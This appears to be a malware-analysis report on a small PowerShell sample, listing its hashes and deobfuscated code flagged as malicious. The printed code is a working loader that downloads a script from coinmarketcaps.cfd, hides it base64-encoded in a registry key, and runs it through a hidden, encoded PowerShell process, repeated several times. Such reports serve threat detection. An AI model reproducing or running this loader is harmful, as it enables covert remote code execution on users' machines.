7ec0bbdada8f71d6192e512d553b0bc4
PowerShell | MD5: 7ec0bbdada8f71d6192e512d553b0bc4 | Size: 930 B | application/x-powershell
|
Hash | Hash Value |
|---|---|
| MD5 | 7ec0bbdada8f71d6192e512d553b0bc4
|
| Sha1 | a6e94554a61abe104d129118f2519226b8f745e4
|
| Sha256 | 8b0a9b414d895ced0a4bb3ba586b94463043a6ec5d884e5e0815a740ccf9ac96
|
| Sha384 | 62a73dbdf4aed370b6b88a0d70a381d6e54d72f6066f60ae4af9bb08f6a2c6ea59bdea9fdefcd26671c0e8c251b3d82a
|
| Sha512 | e97cf7d93191b4b997fb24b251a21595033b93564893ae1ea50c29aac8eac432a31f96c95b34b23a9862daed271d7895512969ce5efc6e7f8a08041d7cc2c645
|
| SSDeep | 24:x0e9zTe8VbahAFVkGArxl2eQxUaqw6kgQoM95Y:Lli8la+Vk9xgekgwIQowq
|
| TLSH | 6E11141DEF30F9C84B3C728890AA2E1B1154612997336DE4C5085CB11D297A6CF5A6C4
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec SQBOAFYAbwBrAEUALQBFAHgAcAByAEUAcwBzAEkATwBuACAAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgARwBlAFQALQBpAFQARQBtAFAAcgBPAFAAZQBSAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVABhAGIAbABlAHQAUABDACcAIAAtAE4AYQBtAGUAIAAnACMAcwBoAGEAZABvAHcAXwBjAEMAdgBCAHAAUwAnACkAIAB8ACAAUwBFAEwAZQBjAFQALQBvAEIASgBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAjAHMAaABhAGQAbwB3AF8AYwBDAHYAQgBwAFMAKQApACkAKQA=" |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) |
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec SQBOAFYAbwBrAEUALQBFAHgAcAByAEUAcwBzAEkATwBuACAAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgARwBlAFQALQBpAFQARQBtAFAAcgBPAFAAZQBSAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVABhAGIAbABlAHQAUABDACcAIAAtAE4AYQBtAGUAIAAnACMAcwBoAGEAZABvAHcAXwBjAEMAdgBCAHAAUwAnACkAIAB8ACAAUwBFAEwAZQBjAFQALQBvAEIASgBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAjAHMAaABhAGQAbwB3AF8AYwBDAHYAQgBwAFMAKQApACkAKQA=" |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec SQBOAFYAbwBrAEUALQBFAHgAcAByAEUAcwBzAEkATwBuACAAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgARwBlAFQALQBpAFQARQBtAFAAcgBPAFAAZQBSAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVABhAGIAbABlAHQAUABDACcAIAAtAE4AYQBtAGUAIAAnACMAcwBoAGEAZABvAHcAXwBjAEMAdgBCAHAAUwAnACkAIAB8ACAAUwBFAEwAZQBjAFQALQBvAEIASgBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAjAHMAaABhAGQAbwB3AF8AYwBDAHYAQgBwAFMAKQApACkAKQA=" Malicious |
7ec0bbdada8f71d6192e512d553b0bc4 |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) Malicious |
7ec0bbdada8f71d6192e512d553b0bc4 > [Base64-Block] |
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec SQBOAFYAbwBrAEUALQBFAHgAcAByAEUAcwBzAEkATwBuACAAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgARwBlAFQALQBpAFQARQBtAFAAcgBPAFAAZQBSAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVABhAGIAbABlAHQAUABDACcAIAAtAE4AYQBtAGUAIAAnACMAcwBoAGEAZABvAHcAXwBjAEMAdgBCAHAAUwAnACkAIAB8ACAAUwBFAEwAZQBjAFQALQBvAEIASgBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAjAHMAaABhAGQAbwB3AF8AYwBDAHYAQgBwAFMAKQApACkAKQA=" Malicious |
7ec0bbdada8f71d6192e512d553b0bc4 > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) Malicious |
7ec0bbdada8f71d6192e512d553b0bc4 > [Base64-Block] > [Deobfuscated PS] |